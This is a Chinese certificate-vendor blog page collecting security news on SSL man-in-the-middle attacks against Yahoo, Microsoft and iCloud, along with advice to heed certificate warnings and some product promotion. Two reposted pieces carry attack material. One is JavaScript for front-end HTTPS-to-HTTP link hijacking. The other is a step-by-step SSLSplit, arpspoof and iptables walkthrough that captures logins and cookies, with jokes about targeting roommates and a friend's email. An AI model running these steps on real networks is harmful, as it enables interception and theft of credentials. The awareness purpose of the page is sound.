沃通(WoSign)数字证书
EmailGoogleTwitterFacebook

代办签证泄隐私,旅游网站归责“黑客”

晨报记者 李晓明 在正规旅游网站购买了代办签证业务,却引来假冒客服电话诈骗,让人疑惑的是,假冒者能准确说出受害人的个人信息,让消费者难辨真伪。近期,多名市民投诉称,在百程网办理签证时,接到自称百程网客服人员的电话,要求重新汇款,而且能准确地说出他们的个人信息。 对此,百程网昨日回应称,这是不法分子冒用百程客服进行诈骗,目前已向警方报案。 至于为何对方会知晓客户的个人信息,百程网表示是因为系统遭遇黑客入侵,导致客户信息泄露。 假客服说出用户个人信息 市民王小姐计划下个月去韩国,在百程网订购了代办签证业务,当天便用支付宝在线支付了订单。 第二天,王小姐接到自称百程网客服的电话。对方称,前一天的订单因为支付宝升级,没有收到款项,要王小姐提供银行卡信息,办理退款后再重新下单。 “对方不仅报出我的全名,还准确说出我家住址、订单内容等具体信息。”王小姐说:“因为签证时间比较紧张,我没有怀疑,马上就重新下单,对方叫我把卡号后六位数字给他,并说一定要快,20秒内要把网站发过来的验证码给他。” 蹊跷的是,王小姐重新打款后,收到了银行确认支付的短信,但对方仍表示,钱没有到账,让她再重新支付一次。“他还要继续骗我说这个没有成功,又发来一条短信。这个时候我已经知道上当受骗了,就立即报警了”。 黑客入侵致用户信息泄露 为何多名消费者在百程网订购代办签证业务,下订单后又被通知要重新付款? 对此,百程网昨日回应称,百程网系统遭到黑客入侵,近一个月订单中的少部分用户个人基本信息不慎泄露,包括姓名、手机、邮箱等。“不法分子通过冒用百程网官方400电话进行诈骗。此次信息泄露不涉及任何员工的个人行为”。 百程网表示,经过技术部门全力抢修,目前信息泄露问题已得到有效控制,“后续会主动联系受害用户,尽最大努力对用户进行赔偿”。 此外,百程网已在第一时间向全部用户推送了防诈骗短信,并发布致歉声明。 网上代办签证存安全风险 记者了解到,网上代办签证需要提交的个人资料分两部分,一是线上提交部分,包括:姓名、联系方式、地址等个人信息。二是实体资料部分,根据各国家使馆办理签证的要求提交的相应资料。线上资料的保密主要通过网站的网络安全技术手段保障信息安全。实体资料的保密主要根据网站内部的管理规定。 一般而言,具备资质的网站代办签证时,客户的资料一般会被网站及工作人员、大使馆或代签中心知晓。 百程网表示,用户资料提交后会给到所对应国家的专业操作人员手中,专人专办,且所有资料不得带出办公区域,若违反相关规定将予以开除或送至公安机关处置;同时,在办公区里安置全方位、无死角的监控系统,即时监控操作人员;在送签环节,采取“人照不分离”原则,由工作人员亲自将申请资料送至大使馆; 护照或原件会快递至用户手中。 法律人士提醒,网上代办签证虽然便利,但由于涉及个人信息,存在一定风险,除有可能遭遇假签证之外,还有可能遭遇个人信息泄露等问题。一旦个人信息被泄露,可能会招致一系列的麻烦,比如电话诈骗、垃圾短信,冒用身份证办信用卡进行透支等。因此选择网上代办签证,首先要审核对方是否具备相关资质,同时对交易中所涉及的个人隐私信息进行妥善保管,并在交易结束后及时销毁。

致我们终将弃用的密码

国外最流行的微博平台Twitter正在策划一项很大胆的项目:试图率先在Twitter上结束我们所习惯的密码时代。 其实,早在一年前,Twitter的高级产品经理就开始环游世界,前往古巴、印度和印尼等地实地考察了世界各地的人们是如何使用移动设备的,无疑Twitter是想在全球吸引更多的用户。和大多数科技公司一样,Twitter经典登陆方式也是一个邮箱地址加一个密码的组合。 但是他们发现在远离美国的其他发展中国家,人们更多的习惯是使用和认可他们手上的移动设备,而不是电子邮件!这就使得当地人很难轻易的注册Twitter并享受twitter的其他优质服务,于是Twitter雄心勃勃要解决这一困难,何不抛弃密码,以某种方式信任一次手机让用户直接登录?! 在四年后的首次开发者大会上,Twitter推出一套旨在为重塑移动应用程序的开发工具,估计技术细节只有开发人员会很感兴趣哦,他们把它称作Fabrics。其中一个部分叫Digits,它果然允许用户无需记住密码就可以登录到应用程序。 这个过程也很简单:用户在应用程序的登录页面输入自己的手机号码,然后twitter用某一次性代码给这个手机号码发个验证码。你一旦进入正确的验证码,就可以像往常一样打开twitter应用程序了。 何为Digits(数字) 对大多数人来说,新版twitter的亮点无疑就是Digits,它是公司为取代密码的而作出的成果。在不久的将来,Twitter用户就可以用Digits登录Apps了,登录过程有三个步骤: 1、在移动设备的登录页面有一个注册的选项,页面上输入你的电话号码; 2、接着Twitter会发送一条短信,你输入其中的验证码。(这个过程很像任何人注册WhatsApp或相似应用哟~) 3、twitter服务器确认验证码后,就可以开始使用了; x、如果下次你再登录到应用程序,还需要新的验证码,流程同上。 Digits真的安全吗? 为什么作出这种弃用密码、登陆APP的选择呢?思考缘由,是因为考虑到发展中国家电子邮件并不常用。同时开发这一功能还有一个好处就是解决了人们要记住多个web网站密码的痛苦。 对整个系统的安全而言还是传统的密码更安全。尽管Digits使用手机是一种物理性质的需要,再加上临时用的一次性验证码,这看起来已经很安全了,但是有些科技博客对此却提出质疑: 电话号码并不是绝对安全的,虽然不容易但是存在一个可能——电话号码被克隆! Fabric的开发工具还包含公司的其他应用程序,如Crashlytics MoPub TwitterKit。 Digits目前可以在216个国家使用28种不同语言,并且跨iOS、Android系统,现在还支持Web。 WoSign方案 取代密码,我们一直在努力!WoSign将考虑采用手机二维码加全球信任证书的方式取代密码,同时解决便捷和安全问题。 转载改编自FreebuF.COM

沃通应邀参加2014全国电子认证技术交流大会,并做特邀报告

全国电子认证技术交流大会(Conference on Identification, Certification and Authentication,CICA2014)于2014年10月16日~17日在中国科学院大学国际会议中心(北京雁栖湖校区)举行。本次会议由中国密码学会电子认证专业委员会和全国信息安全标准化技术委员会鉴别与授权工作组(WG4)联合主办,中国科学院大学、中国科学院信息工程研究所承办。   会议旨在为电子认证领域的相关人员搭建学术与技术交流的平台,交流电子认证领域的最新研究成果,分享电子认证管理与政策建议,探讨电子认证的创新商业模式,为电子认证的新技术、新方法、新产品提供展示平台。   沃通应邀参加,王高华先生在会上做了题为“国产密码算法SM2在服务器证书上的应用研究”的演讲报告,首次公开披露了沃通已经能签发全球信任的采用SM2算法的SSL证书。 SM2算法虽然还不是国际标准,但已经在客户端证书和VPN设备上得到了广泛应用,而在服务器证书领域,由于目前的国际信任根证书都是采用RSA或ECC加密算法,所以无法直接采用SM2根证书链来签发全球信任的SSL证书。我公司在3月份拿到工信部CA牌照后,就组织技术人员攻关,已于7月底实现了在全球信任根下签发采用SM2加密算法的SSL证书,使得国产加密算法能在服务器证书上真正达到实用的水平。   在这次会议上,王高华先生同与会CA代表和密码领域技术专家们分享了沃通采用混合算法的解决方案,既解决了证书链信任问题,又解决了用户与服务器之间采用国产加密算法加密的问题,为国产SM2加密算法在服务器证书上应用扫平了技术障碍。王高华先生同时在会上展示了已经签发的SM2 SSL证书,下一步将与国产浏览器合作支持采用SM2加密算法的SSL证书。     原文链接http://www.wosign.com/news/wosign-CICA2014.htm

SSL中间人攻击频发,为什么还需要SSL证书?

近期SSL中间人攻击事件频发 微软账号系统遭遇大规模SSL中间人攻击 苹果iCloud遭SSL中间人劫持,用户如何防范隐私泄露 根本停不下来:Yahoo在中国遭遇SSL中间人攻击   近期SSL中间人攻击的事件频发,甚至动摇了人们对SSL加密安全的信心。很多不知情的用户可能认为,既然SSL常常被攻击,那还不如不用呢!SSL攻击频发,并不意味着SSL证书不安全,没有SSL的网络,更不安全。 当您访问受SSL证书保护的网站时,如果有中间人攻击或其他不安全因素,浏览器会自动警告,告知您可能面临的风险; 而没有SSL证书保护的网站,采用不安全的http明文传输协议,根本无需中间人攻击,隐私信息直接明文“裸奔”了,不是专业黑客,也能截获隐私数据。http没有一种签名机制,来验证内容的真实性,即使页面被篡改了,浏览器也完全无法得知,更无法预警告知用户。 我们所能做的,不是排斥SSL证书应用,而是真正了解SSL工作原理,正确利用这种防护措施,保障自己的隐私安全,并朝新的方向展望——让SSL加密无所不在!   今天就以IE浏览器为例,说说用户该怎么判断网站有没有SSL证书保护,如何通过SSL证书状态,判断网站是否存在安全隐患!   如何判断网站有没有SSL证书保护? 1、可使用https:// 正常访问; 2、浏览器显示醒目安全锁,点击安全锁,可查看网站真实身份。 3、使用了EV SSL证书的网站,显示绿色地址栏! 如果您访问的网站呈现以上特征,说明该网站已受SSL证书保护。       如何通过SSL证书 检查网站是否存在安全隐患! 受SSL证书保护的网站,浏览器会自动查验SSL证书状态,确认无误,浏览器才会正常显示安全锁标志。而一旦发现问题,浏览器会报各种不同的安全警告。一旦出现安全警告,绝对不能继续访问!!虽然某买票网站至今仍强迫用户继续浏览,但这并不表示这种做法是正确。   1. 部署了 SSL 证书的网站网页不能有不安全因素 部署了 SSL 证书的网站正常情况下会自动显示安全锁标志,但如果部署了 SSL 证书的网站有不安全因素就会有警告,表明此页面中含有指向其他没有部署 SSL 证书的页面,为了安全起见,建议您选择 “ 否 ” ,浏览器就不显示不安全的内容,这些内容一般都是 Flash 动画或 Java Script ,如果选择 “ 是 ” ,则浏览器不会显示安全锁标志。 2. SSL 证书不是由浏览器中“受信任的根证书颁发机构”颁发的,则浏览器会有安全警告 对于 IE 浏览器,您可以浏览器的“工具” – “ Internet 选项” – “内容” – “证书”,就能看到 “ 受信任的根证书颁发机构 ” ,如下图所示,表明 IE 浏览器能正常识别出这些证书颁发机构颁发的数字证书: 而如果 SSL 证书不是由浏览器中 “ 受信任的根证书颁发机构 ” 颁发的,则浏览器会有安全警告。如图所示, IE7 浏览器的警告信息为 “ 此网站出具的安全证书不是受信任的证书颁发机构颁发的,安全证书问题可能显示试图欺骗您或截获您向服务器发送的数据,建议关闭此网页,并且不要继续浏览该网站。 此次iCloud网站报错,正是因为SSL中间人劫持过程中,使用了自签的SSL证书。而浏览器检测到这个异常,才会报错提醒。而很多用户忽视了这一警告,继续登录使用,才会造成账号泄露。 3. 如果是浏览器能识别的 SSL 证书,则接着就要检查此 SSL 证书是否已经被吊销 如果是浏览器能识别的 SSL 证书,则接着就要检查此 SSL 证书中的证书吊销列表,如果此证书已经被证书颁发机构吊销,则会显示警告信息:“此组织的证书已被吊销。安全证书问题可能显示试图欺骗您或截获您向服务器发送的数据。建议关闭此网页,并且不要继续浏览该网站。”如下图所示: 4. 如果此证书没有被吊销,则接着会检查此证书是否过期 如果此证书没有被吊销,则接着会检查此 SSL 证书是否过期,如果证书已经过了有效期,则一样会显示警告信息:“ 此网站出具的安全证书已过期或还未生效。安全证书问题可能显示试图欺骗您或截获您向服务器发送的数据。建议关闭此网页,并且不要继续浏览该网站。”如下图所示: 5. 如果此 SSL 证书是在有效期内,则检查部署此 SSL 证书的网站的域名是否与证书中的域名一致 如果此 SSL 证书是在有效期内,则检查部署此 SSL 证书的网站的域名是否与证书中的域名一致,如果不一致,则浏览器也会显示警告信息:“此网站出具的安全证书是为其他网站地址颁发的。安全证书问题可能显示试图欺骗您或截获您向服务器发送的数据。建议关闭此网页,并且不要继续浏览该网站。”如下图所示: 6. 如果以上都没有问题, IE7 浏览器还会到欺诈网站数据库查询此网站是否已经被列入欺诈网站黑名单 如果以上都没有问题, IE7 浏览器还会到欺诈网站数据库查询此网站是否已经被列入欺诈网站黑名单,如果是,则会显示:“ IE 已发现一个已报告的仿冒网站。仿冒网站假冒其他网站并试图欺骗您泄漏个人信息或财务信息。建议关闭此网页,并且不要继续浏览该网站。 ”如下图所示: 7. 新版浏览器还要此证书是否是EV SSL证书 如果以上都没有问题,新版浏览器(IE7以上版本)而且还要检查此证书是否是EV SSL证书,如果不是,则显示一般SSL证书的安全锁标志;如果是,则需要按照EV

Read More…

SSL Strip的未来:HTTPS 前端劫持

如果你总认为,你在访问某网站时,上传下载的数据没有任何价值,那为何仍有如此多滴黑客怪蜀黍,醉心于SSL劫持? 从黑客的思维思考隐私安全,你才知道该保护些什么!——搬运工语录 小编吭哧搬运过来,各位慢慢享用!   前言 在之前介绍的流量劫持文章里,曾提到一种『HTTPS 向下降级』的方案 —— 将页面中的 HTTPS 超链接全都替换成 HTTP 版本,让用户始终以明文的形式进行通信。 看到这,也许大家都会想到一个经典的中间人攻击工具 —— SSLStrip,通过它确实能实现这个效果。不过今天讲解的,则是完全不同的思路,一种更有效、更先进的解决方案 —— HTTPS 前端劫持。 后端的缺陷 在过去,流量劫持基本通过后端来实现,SSLStrip 就是个典型的例子。 类似其他中间人工具,纯后端的实现只能操控最原始的流量数据,这严重阻碍了向更高层次的发展,面临众多难以解决的问题。 动态元素怎么办? 如何处理数据包分片? 性能消耗能否降低? …… 动态元素 在 Web 刚出现的年代里,SSLStrip 这样的工具还是大有用武之地的。那时的网页都以静态为主,结构简单层次清晰。在流量上进行替换,完全能够胜任。 然而,如今的网页日益复杂,脚本所占比重越来越多。如果仅仅从流量上着手,显然力不从心。 var protocol = ‘https’;document.write(‘<a href=”‘ + protocol + ‘://www.alipay.com/”>Login</a>’); 即使非常简单的动态元素,后端也毫无招架之力。 分片处理 分块传输的道理大家都明白。对于较大的数据,一口气是无法传完的。客户端依次收到各个数据块,最终才能合并成一个完整的网页。 由于每次收到的都是残缺的碎片,这给链接替换带来很大的麻烦。加上不少页面并非标准的 UTF-8 编码,因此更是难上加难。 为了能顺利进行,中间人通常先收集数据,等到页面接收完整,才开始替换。 如果把数据比作水流,这个代理就像大坝一样,拦截了源源不断往下流的水,直到蓄满了才开始释放。因此,下游的人们需忍受很久的干旱,才能等到水源。 性能消耗 由于 HTML 兼容众多历史遗留规范,因此替换工作并非是件轻松事。 各种复杂的正则表达式,消耗着不少的 CPU 资源。尽管用户最终点击的只是其中一两个链接,但中间人并不知道将会是哪个,因此仍需分析整个页面。这不得不说是个悲哀。 前端的优势 如果我们的中间人能打入到页面的前端,那么情况会不会有所改善呢? 分片处理 首先,要派一名间谍到页面里。这是非常容易办到的: 不像超链接遍布在页面各处,脚本插入到头部即可运行了。所以我们根本不用整个页面的数据,只需改造下第一个 chunk 就可以,后续的数据仍然交给系统转发。 因此,整个代理的时间几乎不变! 动态元素 很好,我们轻易渗透到页面里。但接着又如何发起进攻? 既然到了前端里,方法就相当多了。最简单的,就是遍历超链接元素,将 https 的都替换成 http 版本。 这个想法确实不错,但仍停留在 SSLStrip 思维模式上。还是『替换』这条路,只是从后端搬到前端而已。 尽管这个方法能胜任大多场合,但仍然不是最完美的。我们并不知道动态元素何时会添加进来,因此需要开启定时器不断的扫描。这显然是个很挫的办法。 性能优化 事实上,超链接无论是谁产生的、何时添加进来的,只要不点击,都是不起作用的。所以,我们只需关心何时去点击就可以 —— 如果我们的程序,能在点击产生的第一时间里控制住现场,那么之后的流程就可由我们决定了。 听起来似乎很玄乎,不过在前端,这只是小菜一碟的事。点击,不过个事件而已。既然是事件,我们用最基础的事件捕获机制,即可将其轻松拿下: document.addEventListener(‘click’, function(e) { // …}, true); DOM-3-Event 是个非常有意义的事件模型。之前用它来实现『内联 XSS 拦截』,如今同样也可以用来劫持链接。 我们捕获全局的点击事件,如果发现有落在 https 超链接上,果断将其……拦截? 如果真把它拦截了,那新页面就不会出现了。当然你会说,可以自己 window.open 弹一个,反正点击事件里是可以弹窗的。 不过,请别忘了,并非所有的超链接都是弹窗,也有不少是直接跳转的。你也会说可以修改 location 来实现。 但要识别是『弹窗』还是『跳转』,并不简单。除了超链接的 target 属性,页面里的 <base> 元素也会有影响。当然,这些相信你都能处理好。 然而,现实未必都是那么简单的。有些超链接本身就绑定了 onclick 事件,甚至在其中 return false 或 preventDefault,屏蔽了默认行为。如果我们不顾及这些,仍然模拟跳转或弹窗,那就违背页面的意愿了。 事实上,有一个非常简单的办法:当我们的捕获程序运行时,新页面还远没出现,这时仍有机会修改超链接的 href。待事件冒泡完成、执行默认行为时,浏览器才读取 href 属性,作为最终的结果。 因此,我们只需捕获点击事件,修改超链接地址就可以了。至于是跳转、弹窗、还是被屏蔽,根本不用我们关心。 就那么简单。因为我们是在用户点下去之后才修改,所以浏览器状态栏里,显示的仍是原先 https ! 当然,点过一次之后,再把鼠标放到超链接上,状态栏里显示的就是修改后的了。 为了能继续忽悠,我们在修改 href 之后的下个线程周期里,把它改回来。因为有了一定延时,新页面并不受影响。 var url = link.href;                                // 保存原始地址link.href = url.replace(‘https://’, ‘http://’);     // 暂时换成 http 的setTimeout(function() {     link.href = url;                                // 新页面打开后,还原回来}, 0); 这样,页面里的超链接始终都是正常的 —— 只有用户点下的瞬间,才临时伪装一下。 更多拦截 除了通过超链接,还有其实方式访问页面,我们应尽可能多的进行监控。例如: 表单提交 window.open 弹窗 框架页面 ….. 表单提交 表单提交和超链接非常类似,都具有事件,只是将 click 换成 submit,href 换成 action 而已。 脚本弹窗 函数调用的最简单了,只需一个小钩子即可搞定: var raw_open = window.open;window.open = function(url) {

Read More…

SSL中间人证书攻击测试演练

如此直击灵魂的攻击演练,小编吐血推荐~!!看完演练过程,你还认为wifi钓鱼劫持到密码盗取钱财是“耸人听闻”的事情吗?你还会觉得浏览器的安全证书出错提醒是可有可无吗?   SSL中间人攻击事件 这几天,SSL证书欺骗可以说是占尽了风头,打开微博,朋友圈,FreeBuf处处可以见到SSL证书欺骗的资讯文章。 微软账号系统遭遇大规模SSL中间人攻击 国内iCloud服务器遭遇中间人攻击,中国苹果用户隐私不保 根本停不下来:Yahoo在中国遭遇SSL中间人攻击 …… 先是iCloud,然后又是Yahoo,还有就是前几天的Microsoft。接下来的话题,我想再次跟大家聊聊中间人,不过这次主要是跟大家聊一聊关于SSL证书欺骗那点事儿。(说到这个我就心痛,我会告诉你到今天我还看到了一个中间人提示么= =..) 前言 其实说到MITM我们很正常的会想到很多工具,比如说我前几天刚写的MITMf,比如说:SSLStrip。确实,SSLStrip很强大,不过SSLStrip核心思想还是替换:将https协议强制替换为http。这在很多环境下是受限的。关于SSLStrip的介绍我这里不说太多,网上已经有了很多教程。优劣大家自己去评判。 最近网上大牛EtherDream还提出了一个关于SSLStrip的未来思路的思考,不愧是前端的大牛,十分具有深度,推荐大家去看一下。 不过,今天我们文章的主角却不是SSLStrip,而是另外一款工具——SSLSplit。 工具简介 关于这款工具我做一点简要的介绍:工具的主要原理是以中间人的身份将证书插入到客户端和服务器中间,从而截断客户端和服务器之间的数据。之前我们大多数做的都是针对于80端口的欺骗,也就是说,只要是超越了80端口我们就会有点棘手:比如常用的443端口,比如465和587端口,这些都是通过SSL加密进行数据传输的,简单的80端口监听肯定是什么都拿不到的。这个时候,就体现出SSL证书劫持的作用了。 这里给出SSLSplit的git地址: https://github.com/droe/sslsplit 不说废话,下面开始安装。 安装 首先我们从git上面把源码搞下来: git clone https://github.com/droe/sslsplit.git /opt/sslsplit 这里说一下,源码编译依赖于两个包,这个kali默认是没有安装的,我们需要安装一下 apt-get install libssl-dev libevent-dev 然后进行编译 make make install 成功之后我们输入sslsplit -h应该就会有帮助回显了,很简单,不废话。 数据流量重定向 关于数据怎么重定向到你的电脑上面也就是你怎么成为靶机和服务器的中间人,这个问题不是我们今天讨论的重点,但是因为跟本文还是有点关系,我给出几个建议方式吧: 1、ARP攻击 进内网……还用我多说么?永恒的传奇,不老的ARP。 2、DNS劫持 将靶机的DNS劫持到这里来,想做什么就好说了。 3、WIFI钓鱼 拿着个树莓派改装版或者拿着菠萝瞎溜达,哪里人多找哪里。 4、修改hosts文件 把舍友暴打一顿,然后把他的电脑的hosts文件改掉,反正他也不懂。 5、修改默认网关 把舍友暴打一顿,然后把他的电脑的默认网关改成自己的IP,反正他也不懂。 …… 这里我暂时可以想到的就这么多,另外友情提示一下:如果你的朋友比你高比你壮,别去轻易尝试…… 这次测试我采用的是ARP攻击的方式。其他方式都是可以的,不一一赘述。 中间人攻击 准备好了之后我们开始尝试中间人攻击。 首先,我们需要一份数字根证书,用来进行中间人欺骗。如果你已经有数字证书就可以跳过这部分了土豪,女生请直接联系我。如果暂时还没有证书的,我们为了实验可以用openssl自己生成一封证书(关于数字证书的生成方式大家可以自行百度,网上很多)。简略步骤如下: 先生成一个key文件 openssl genrsa -out ca.key 2048 然后自签名用生成的key生成公钥证书: openssl req -new -x509 -days 1096 -key ca.key -out ca.crt 这样我们就把根证书建好了。 然后我们还需要在攻击测试机上进行端口流量转发,将对应的流量转到工具中来,在此之前需要打开ip_forward功能: echo 1 > /proc/sys/net/ipv4/ip_forward 接着是用iptables进行流量转发,需要把我们需要的端口进行转发: iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-ports 8080 iptables -t nat -A PREROUTING -p tcp –dport 443 -j REDIRECT –to-ports 8443 iptables -t nat -A PREROUTING -p tcp –dport 587 -j REDIRECT –to-ports 8443 iptables -t nat -A PREROUTING -p tcp –dport 465 -j REDIRECT –to-ports 8443 iptables -t nat -A PREROUTING -p tcp –dport 993 -j REDIRECT –to-ports 8443 iptables -t nat -A PREROUTING -p tcp –dport 995 -j REDIRECT –to-ports 8443 当然,在此之前请记得使用iptables -F清除原有设置。 我们可以使用 iptables -t nat -L 看一下我们的当前设置 这里可以确认没有问题了,进行下一步。 下一步是ARP欺骗,这个不用我说,大家都会,贴出命令: arpspoof -i eth0 -t 192.168.217.129 -r 192.168.217.2 这里我建议等到临开始劫持的时候再打开ARP,因为我们的端口转发已经打开,ARP流量已经不能与平时一样正常走攻击机的正常端口,会出现靶机上不了网的情况。 接下来就是SSLSplit出场了。 下面是帮助界面: 这里我不全都介绍,只介绍有用的参数: -k 指定私钥key文件,进行欺骗 -c 指定Root CA证书文件 -D Debug模式,用于输出SSLSplit状态,建议使用时加上 -j 指定log目录地址 -S 指定-j参数目录下需要记录截断GET、POST请求的子目录地址 -l 指定存储的连接信息文件 ssl IP 端口 指定ssl需要监听的端口 tcp IP 端口 指定tcp需要监听的端口 这时候我们就可以进行中间人劫持了。 启动ARP arpspoof -i eth0 -t 192.168.217.129 -r 192.168.217.2 接着启动SSLSplit sslsplit -D -l connect.log -j /opt/sslsplit/test1 -S logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080 看图说话 启动之后,ARP结果如下: SSLSplit启动之后: 然后此时我们使用靶机浏览https网页,就已经发现类似以上yahoo的状况了: 因为我们是追求科学的人,所以我们选择继续浏览: 在这里我们已经可以清晰看到我们的制作的根证书已经替换掉了服务器的官方证书。 然后,我又尝试了一下其他的诸如几个email网站,百度,taobao,微博等网站进行登录尝试,尝试的结果是: 部分网站可以直接嗅探到登录用户名和密码,而其他网站也大都获取到了Cookie等数据: 下面是我们通过嗅探得到的部分连接过程的GET以及POST请求文件: 然后我们可以看到记录中有关Cookie的文件: 我们看其中任意一个: (请无视我这不专业的打码技术=。=如有信息泄露,请第一时间联系我) 可能有朋友也注意到了在iptables进行流量转发的时候还有其他端口,所以其实也完全可以进行Email数据劫持,我忽然记起我有个朋友特别喜欢用Outlook…… 差不多了,就到了这里吧。我还要去搞我那个喜欢用Outlook的朋友呢,听说他的邮箱好多大片儿呢! 总结 有的朋友会说你这个肯定不行啊,因为很明显就被别人看出来了,那么个大红的姨妈警告谁看不见啊!这里我解释一下: 1、并不是所有的站点都会有这么明显的提示,经测试,部分国内某些权威的站点就不存在这样的提示。 2、我们本次是本着科普的目的进行单纯的试验,证书完全是自己生成的。那么如果证书真的是权威机构颁发的呢?很贵么? 3、目前我们的网络安全普及程度我想大家都看在眼里,并不是所有人都那么在乎这个红框框的,只要能用不就行了。另外,如果没记错,我们经常使用的买票的那谁的证书也不见得没问题吧,大家还不是照用不误,甚至给很多人以误导:这个提示是没用的,证书有错也是安全的,不信你看那谁.cn!相信你会无话可说。 这个时候如果使用证书劫持去搞wifi钓鱼,你还会说劫持到密码盗取钱财是“耸人听闻”的事情吗? 当然工具没什么技术含量,最重要的还是思路。希望本文可以让大家有点滴收获。:) [文/FreeBuf小编xia0k   参考来源:github.com philippheckel.com 转载请注明FreeBuf.COM]

根本停不下来:Yahoo在中国遭遇SSL中间人攻击

截止 10月20日 下午16:46分,攻击仍然在继续……… 2014年10月20日14:30分,雅虎在中国大陆地区再次受到SSL中间人攻击,国内三大运营商访问都存在问题,而香港、美国访问则没有问题。其证书用RSA 1024bit加密,MD5自签名,来自CN。 事件回顾 从微软登陆系统live10月2日,遭受大面积SSL中间人攻击。详见:http://www.freebuf.com/news/45929.html 到icloud刚搬回国内不久,遭受中间人攻击。详见:http://www.freebuf.com/news/47744.html 证书截图 建议各位网友挂VPN访问相关网站,修改hosts,谨慎填写账号信息。 [本文由作者Xarray原创并投稿,转载请注明来自FreeBuf.COM]

微软账号系统遭遇大规模SSL中间人攻击

10月2日至10月6日,微软账号(login.live.com)在中国大陆地区遭受大面积SSL中间人攻击。访问网站后,浏览器提示网站证书不受信任,并且HTTPS(443)端口不可达。 通过对证书的查看,我们发现证书已经被攻击者替换了 假冒的为hotmail证书,可以看见连hotmail都拼错了,少了个“l”(这是测试用的么?) 对比正常的证书 SSL中间人攻击历史案例 对于SSL证书替换的中间人攻击,其实并不是第一次。 2011年,Skype出现SSL中间人攻击,登录网站被定向北京市公安局网络安全保卫处 2013年1月26日GitHub遭受SSL中间人攻击。 2014年9月30日,Yahoo在中国大陆遭受SSL中间人攻击 2014年8月Google IPv6教育网出现SSL错误,HTTPS通信由TLSv2变成了TLSv1。(这可能就是“Google急着杀死加密算法SHA-1”的原因了,详情:http://www.freebuf.com/news/special/44288.html) 作为鱼肉的我们,建议在网站证书提示时,查看证书信息,谨慎输入账号密码或者及时修改。 更新 截止10月6日晚20:45分开始 login.live.com再次受到攻击

苹果iCloud遭SSL中间人劫持,用户如何防范隐私泄露?

近日,苹果iCloud服务器在中国被人使用SSL中间人劫持,部分地区用户隐私恐将不保。据了解,苹果iCloud网站有多个IP地址,若用户访问苹果iCloud时被随机分配到23.59.94.46这一IP地址,又忽视了网页安全警告,输入到iCloud的用户名和密码都会被制造自签证书的中间人拿到,存储在iCloud的私房照片、钥匙圈里的各种帐号、密码都会被别人偷走,前不久,好莱坞“艳照门”就是黑客入侵明星们的iCloud账户引起的。   在此,沃通CA(www.wosign.com)提醒用户,在使用云服务时牢记以下几点,防范隐私被泄露!   1、  遇到“网站安全证书不受信任”的浏览器警告,请勿继续访问! 过去,由于国内网站运营者的安全意识薄弱,多数网站为节省费用,采用不受浏览器信任的自签名SSL证书,自签证书泛滥成灾。安装自签证书的网站频繁报错,导致中国用户在使用过程中,养成了一个非常不安全的习惯,就是当浏览器提示“网站安全证书不受信任”时,不自觉地就点击“继续浏览”。 此次iCloud用户信息泄露,正是因为忽视了网页安全警告,继续登录使用,让SSL中间人有了可乘之机。沃通CA提醒您,在使用云服务、网上银行、网上支付等网络应用时,遇到“网站安全证书不受信任”的警告,绝对不能继续登录使用、输入账号密码等。 不同的浏览器会提示不同的安全警告语,以下是各浏览器对iCloud的安全警告。 图一:IE 浏览器对iCloud的安全警告图 图二:火狐浏览器对iCloud的安全警告图 图三:360浏览器对iCloud的安全警告图 图四:chrome浏览器对iCloud的安全警告图 图五:Safari浏览器对iCloud的安全警告图 2、一定要选择使用了SSL证书的云服务 云服务、网上银行、网上支付等重要的网络应用服务,一定要选择使用SSL证书的网站。用了SSL证书不也被中间人攻击吗?但如果没有用SSL证书加密的应用服务,根本无需中间人攻击,隐私信息直接“裸奔”了,任何人都能截获。 为了维护品牌形象和用户数据安全,建议网络应用服务提供商一定要部署全球信任的SSL证书,通过SSL加密保证用户数据安全,通过SSL认证,防钓鱼网站仿冒。不要与欺诈网站为伍,采用不受信任的自签证书,网站长期被浏览器报错,影响品牌形象,并给SSL中间人大开后门。 为了让更多网站能实现SSL加密,沃通CA已推出一款全球信任的免费SSL证书,支持所有浏览器和主流移动终端,还可不限次数地免费续签,相当于永久免费,让所有的网站都能零成本保网站安全,根本无需使用自签证书。同时,沃通CA也提供收费SSL证书,为安全需求更高的网站,提供更高安全级别的防护,如显示绿色地址栏和中文单位名称等。   3、重要的数据文件,使用PDF文件加密证书,签名加密后再上传到云服务。 目前大部分云服务不提供安全存储服务,而少数使用简单的自编算法加密,防护作用也不大。用户如何保证自己的机密文件安全的存在云服务器上?求人不如求己,沃通CA给您支妙招。您只要申请一张PDF文件加密证书,将机密文件转成PDF格式后签名加密,那这份文件无论放在哪里,都没有人能窃取了。因为内容是密文,窃取了也没用,2048位公钥加密根本无法破解。同样,选择PDF文件加密证书时,也应选择受Adobe信任的证书,比如沃通CA根证书已通过Adobe认证,提供的PDF文件加密证书受Adobe信任。   PDF文件加密证书和签名效果 4、  倡导各大云服务网站,使用客户端证书登录 比尔·盖茨曾表示,口令密码登录方式将很快成为历史。数字证书登录方式,将成为未来的趋势,采用数字证书登录云服务,可以避免口令密码太脆弱、易破解、容易被泄露的安全问题。但由于客户端证书申请、验证、安装等方面的易用性存在问题,导致客户端证书登录的方式尚未普及应用。针对这些问题,沃通CA提出个性定制客户端证书的服务,根据证书的使用场景自定义证书字段,简化申请、验证流程,更加方便、快捷、安全。倡导各大云服务网站,采用客户端证书登录方式,为客户提供一个更安全的登录途径,保障用户数据安全。 PC端证书登录效果 移动端证书登录效果   结语 习近平总书记提出了“没有网络安全就没有国家安全”的概念,同样的“没有网络安全,就没有个人隐私安全”。在大数据时代,任何看似不重要的信息数据,都可能泄露您的隐私信息。无论是网络服务提供商还是用户,都应提供信息安全意识,让以贩卖隐私为生的不法者无机可乘!      

知名网站遭遇SSL中间人攻击 手法很熟业务很忙

据报道,苹果iCloud、雅虎、微软等部分网站的证书被攻击者替换,网民访问时有可能被攻击者截获用户名和密码,网络服务中的内容及个人隐私就有可能被他人偷窥和复制。 2013年1月,GitHub遭受到SSL中间人攻击; 2014年8月,教育网Google IPv6访问遭受同样的SSL中间人攻击; 2013年9月30日,Yahoo 在中国大陆疑似遭到 SSL 中间人攻击; 2014年10月2日,微软网站遭遇SSL中间人攻击; 2014年10月19日,iCloud 服务器在中国被SSL中间人劫持,中国苹果用户隐私可能不保。 附: 攻击iCloud的无效证书 附: iCloud真实证书 防范方法:   当你的浏览器提示证书异常时,请暂停访问,按Alt+w 或浏览器右上角的“关闭”按钮,退出。